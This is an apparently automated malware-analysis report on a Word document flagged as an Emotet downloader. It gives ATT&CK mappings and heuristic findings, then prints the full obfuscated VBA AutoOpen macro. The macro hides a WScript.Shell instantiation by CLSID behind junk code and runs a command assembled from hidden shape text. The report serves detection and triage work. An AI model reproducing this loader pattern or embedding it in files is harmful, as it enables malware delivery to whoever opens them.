Verdict: MALICIOUS
Risk Score: 292
Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine that instantiates WScript.Shell through GetObject on its raw CLSID (rather than CreateObject by ProgID) and calls the object's Run method to execute suspicious commands. The command string is assembled at run time, partly from text stored in a document shape's text frame, which is why it only appears in the reconstructed command line and not as a literal in the macro source. The macro attempts to download and execute a second-stage payload using a combination of cmd.exe and PowerShell, as indicated by the heuristic firings and the reconstructed command line. The ClamAV detection as 'Doc.Downloader.Emotet-6765660-0' strongly suggests the Emotet family.
Heuristics (10)

- ClamAV: Doc.Downloader.Emotet-6765660-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6765660-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. Matched line in script: `Set IzosR = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQbvRacK)` followed by `On Error Resume Next`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set IzosR = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQbvRacK)` followed by `On Error Resume Next`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True`, `Sub AutoOpen()`, `On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10107 bytes |

SHA-256: 7adf6c6e53a5ee0ecc79a6ed430762367edf8892dc4431367c4be3ecf3f219c1

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 155 of 231 identifiers look randomly generated (e.g. 'NtVWpNDacLXfki'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "NtVWpNDacLXfki"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case inoDS
Case 297142988
UicvcJcX = Hex(iWYSwfkr)
pdNDi = Cos(248373298)
sHDiRr = 104002864
Case 231241759
BbacTip = Hex(MBdJqED)
wucPV = Sqr(113778292 / CSng(312267001 - Cos(278561238 - 190747474) + CZpPrGpv + Rnd(326350301 - 23502500)))
PoKon = Hex(hIJCCzfVw)
End Select
For Each TBkjkzjc In kzKWUu
AthFR = 174073123 + Oct(226713646) - 178685378 - CBool(94160608 / 222403560) * 130161962 + Log(AZKuuTVu - CLng(88934742)) - 154680715 + Hex(PFiYCsW)
Next
On Error Resume Next
Select Case JGrBm
Case 247758443
wsCqUE = Hex(uwQuDstsu)
QDzoOLoMp = Cos(229392556)
KVYDzpVHM = 23682995
Case 84362829
PvIfMmkJ = Hex(LBkjni)
jOdfVukb = Sqr(288385190 / CSng(283273131 - Cos(40514731 - 23483270) + limDWhs + Rnd(42108336 - 212951426)))
aEZjwTn = Hex(JLnazZ)
End Select
For Each LVLjnVjh In fcOjMGlb
mDbwO = 249240316 + Oct(51444387) - 28298868 - CBool(152108987 / 321884315) * 291559490 + Log(KkMWLMjZ - CLng(296695384)) - 44728387 + Hex(WoAVFGHDZ)
Next
On Error Resume Next
Select Case pGipGBW
Case 106505152
rmrmaaG = Hex(bWPBw)
EXYpXz = Cos(225948699)
cTDskMpTD = 31413548
Case 56130032
LLkodfOi = Hex(jTattiR)
MzQnuKYi = Sqr(224971823 / CSng(272274480 - Cos(303612726 - 72935234) + TKtLB + Rnd(294479071 - 259499898)))
LrkzUszd = Hex(qiXlrFrzQ)
End Select
For Each LFvqU In UQJjisl
zBHjoaR = 165275376 + Oct(33303801) - 232842663 - CBool(331566756 / 75730962) * 259172734 + Log(bEBOlqc - CLng(201189052)) - 101057180 + Hex(PbAbq)
Next
Set LWFPHZY = Shapes("OAGzqOQvE")
On Error Resume Next
Select Case NAHtJWli
Case 274094184
cjSLsEo = Hex(AzWwXTimw)
KkzOS = Cos(293878410)
QoLziYa = 140544511
Case 73424190
vKsEAU = Hex(JVJPdoL)
XkYFZNR = Sqr(172879011 / CSng(225061842 - Cos(182635491 - 108398096) + zWYwcLH + Rnd(253214646 - 182455611)))
wJPZF = Hex(iNnAzaHoC)
End Select
For Each mwikKc In rYmwNmRh
vRnOqzH = 129990186 + Oct(285928511) - 133420729 - CBool(267975740 / 107623753) * 199685354 + Log(OktNZII - CLng(284320740)) - 316405109 + Hex(YXBSAV)
Next
On Error Resume Next
Select Case uoBCd
Case 307242244
bUhzG = Hex(CrWzUWIH)
dNlEHTFPm = Cos(246377558)
ztiVq = 277942258
Case 17089242
REBIhwOFb = Hex(MhCtv)
nQYnoV = Sqr(34844624 / CSng(307586521 - Cos(78376792 - 334105924) + INBGiUNqu + Rnd(180616666 - 31639197)))
FsOiG = Hex(DFDzSha)
End Select
For Each PGvzHz In IFrZCiNo
BjiMS = 309251431 + Oct(173155768) - 283161521 - CBool(335825026 / 132218507) * 55370527 + Log(nLuUjMFGu - CLng(308671783)) - 134483356 + Hex(VzmWF)
Next
bwZovYtihZQ = "" + QAwjzOzU + FWVIiIGP + AmopV + UIDlvbSc + LWFPHZY.TextFrame.TextRange.Text + LVSNla + hTjcsZzh + ispTYXi
On Error Resume Next
Select Case hAIHaqzl
Case 17329744
XtCRCHad = Hex(BLHBMl)
RzfOr = Cos(322791884)
QOYMmj = 322996516
Case 217960341
aSSvLs = Hex(YvsTicZzv)
YYBFoua = Sqr(205453149 / CSng(252493315 - Cos(18835337 - 202710661) + ouTUAhiup + Rnd(280898477 - 166230581)))
GSwdf = Hex(pZRQKYfG)
End Select
For Each XsQZpQdH In zNcsQAfhz
wVwwzwNFd = 153904715 + Oct(233897724) - 311624829 - CBool(273331635 / 301685126) * 311998045 + Log(CZRjmd - CLng(75651301)) - 916371 + Hex(RKzIQkd)
Next
On Error Resume Next
Select Case QNmwwjsG
Case 240211210
nGtnJZ = Hex(KtWLKqzDq)
jqbTUwG = Cos(212861568)
wczszPMA = 41458745
Case 39994165
bVoLQjGZG = Hex(otIIJQI)
TKnHccVLB = Sqr(168830718 / CSng(318563894 - Cos(326982353 - 271377991) + zwwNBQDnp + Rnd(213944852 - 172770010)))
Ijqjo = Hex(EBmvGTsLp)
End Select
For Each fjdIi In wMMvOswjU
hTUmU = 118277719 + Oct(245924986) - 322873548 - CBool(300164888 / 260300689) * 34375543 + Log(pcUqb - CLng(326611718)) - 53013867 + Hex(DRaMn)
Next
On Error Resume Next
Select Case wMoAPPbB
Case 87910525
YsCOzV = Hex(vnKiNB)
hWNuFZ = Cos(307056184)
TNCXtrCKJ = 18486704
Case 318903461
UjwOcn = Hex(CPBzlL)
SsBhwoU = Sqr(205022139 / CSng(163737448 - Cos(264556565 - 74755354) + cTsdAfQ + Rnd(246548096 - 331731207)))
azSRIsdSO = Hex(MXYKIc)
End Select
For Each IvoKI In ALzJl
UUZXU = 115888526 + Oct(11265198) - 95068723 - CBool(203631582 / 209601975) * 184149621 + Log(GatPF - CLng(305113156)) - 226382970 + Hex(YZIpJnS)
Next
On Error Resume Next
Select Case nSNvG
Case 218559149
vXjjDt = Hex(DUhMrU)
ufZsldzh = Cos(81186579)
nGjHZw = 251302502
Case 179102129
KuSOOU = Hex(cKCVSc)
ZsnnDVD = Sqr(118275175 / CSng(95815361 - Cos(72788365 - 126658097) + wJKdVvlZJ + Rnd(256893983 - 184820919)))
KXSBmi = Hex(vKjKOmLiG)
End Select
For Each sfHvSY In Rhjaj
NmQWc = 211046103 + Oct(15327702) - 12272793 - CBool(204970989 / 235081132) * 134518863 + Log(mNzwrKM - CLng(208526764)) - 70953305 + Hex(HUVswJ)
Next
Set IzosR = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQbvRacK)
On Error Resume Next
Select Case mLNnzIhO
Case 318796373
TrwZIl = Hex(iKtnMQsuI)
OrAYFiXEw = Cos(94032895)
icrifika = 206462394
Case 254775964
jsXTjvavV = Hex(pOSXvsONb)
MXEEiBI = Sqr(214354380 / CSng(221116528 - Cos(50486244 - 134954040) + HOKIBlu + Rnd(184025868 - 197142147)))
svoNY = Hex(jpWME)
End Select
For Each nJoSlh In tNNYMHEM
rcSzrLiI = 104843025 + Oct(136859729) - 189072095 - CBool(6785995 / 321183283) * 288613831 + Log(IYqbBTiA - CLng(88116908)) - 269796070 + Hex(mfWbGUvv)
Next
On Error Resume Next
Select Case kYKGDNQhB
Case 32361328
jCVNGHAbr = Hex(qtwfdTG)
JzOtf = Cos(176173696)
fjRbsWjjT = 194519781
Case 194062419
jrwpOObuf = Hex(aatKhr)
bmWuV = Sqr(177884666 / CSng(159228539 - Cos(232546469 - 338696628) + zKJfCzWWI + Rnd(87765900 - 51709209)))
fEjNUIrii = Hex(ocrqGCOQ)
End Select
For Each GPQbjWj In aWnZizc
SNIGP = 291362688 + Oct(112570750) - 105605341 - CBool(71944023 / 141817071) * 220431221 + Log(LsUIrpBj - CLng(98890235)) - 186479902 + Hex(rnjQLuPKc)
Next
On Error Resume Next
Select Case orkcpQnv
Case 116550386
jsPBw = Hex(wcjBVAdp)
dtzHUIv = Cos(210362330)
aQVYD = 182742411
Case 180431024
zwpvQhL = Hex(rnTESnO)
wMWqnztkM = Sqr(96131937 / CSng(182186258 - Cos(214963699 - 73843776) + YIawBjA + Rnd(232639825 - 86050556)))
lkcVcb = Hex(mCabrEkk)
End Select
For Each DEiBF In LTOKiVm
uNzKFDUY = 51539756 + Oct(249438119) - 215384182 - CBool(271442479 / 200477238) * 240793913 + Log(hDpMzdvAL - CLng(42836254)) - 40844812 + Hex(JGRwMAU)
Next
Const RPiFGfwvStu = 0
On Error Resume Next
Select Case iViWqw
Case 156677388
qcmsiVDj = Hex(kdXdzH)
GdihOZ = Cos(60276493)
wFMoaClFH = 84169984
Case 288013826
Btkpf = Hex(alElmi)
TPNTqa = Sqr(112000656 / CSng(125683208 - Cos(296237086 - 316770504) + JOJSzYP + Rnd(107946699 - 51412118)))
JNtpB = Hex(wXoKTdaGm)
End Select
For Each lRmalIw In jRJImj
WbKKCTi = 266336476 + Oct(205042681) - 118679498 - CBool(315234300 / 27852226) * 246026376 + Log(fnDfa - CLng(256170493)) - 327169446 + Hex(hRBQiIk)
Next
On Error Resume Next
Select Case IFfOYPP
Case 36195674
WmzTk = Hex(NhiIOwX)
zhpME = Cos(133138142)
SLfHOwN = 85017656
Case 252250112
hDUBUwCv = Hex(Jqwpqhkwj)
jCKlmEaT = Sqr(76856425 / CSng(148135368 - Cos(171803603 - 2403866) + scjsDF + Rnd(200645502 - 245563669)))
RIKiVWpa = Hex(zjjCdWS)
End Select
For Each wtcqZVJW In MKohs
vwlCa = 53947260 + Oct(229652445) - 28315535 - CBool(198534064 / 243722690) * 295594303 + Log(TopzJaV - CLng(59069315)) - 241838431 + Hex(vrmBI)
Next
IzosR.Run! bwZovYtihZQ, RPiFGfwvStu
On Error Resume Next
Select Case BwdYlXN
Case 323852527
wESZv = Hex(zHjcBdjGL)
OoVdKhY = Cos(91557138)
RwVZLwa = 46241257
Case 191777847
kRXzA = Hex(ibPJzU)
SuWirTvQ = Sqr(213593427 / CSng(26949528 - Cos(5430934 - 202045144) + dhYjaWDzb + Rnd(82170438 - 285230810)))
VSbGJDbwI = Hex(ioNin)
End Select
For Each sENWUDhB In ijbRr
ifsVATKXA = 168523673 + Oct(227484849) - 265037864 - CBool(167373702 / 16861258) * 239338512 + Log(rjVFXz - CLng(138135021)) - 140162798 + Hex(laDaUA)
Next
On Error Resume Next
Select Case JdIiftNw
Case 332550632
XUakh = Hex(hrvsrTM)
oNdzmnAlR = Cos(151178452)
CRVrTscw = 141395772
Case 163698206
wGEABLii = Hex(pQMtRPPMK)
mDDzf = Sqr(38595861 / CSng(78183823 - Cos(341344584 - 184410428) + OVrWCPXtl + Rnd(251483282 - 270056526)))
idwlE = Hex(aDdQnMm)
End Select
For Each vJYvpLGj In UZpqCsW
YTjUZAt = 5857004 + Oct(231100347) - 169591637 - CBool(160172469 / 147178728) * 326579753 + Log(ikTUOUqw - CLng(194095395)) - 319646716 + Hex(wcMPmXLHp)
Next
End Sub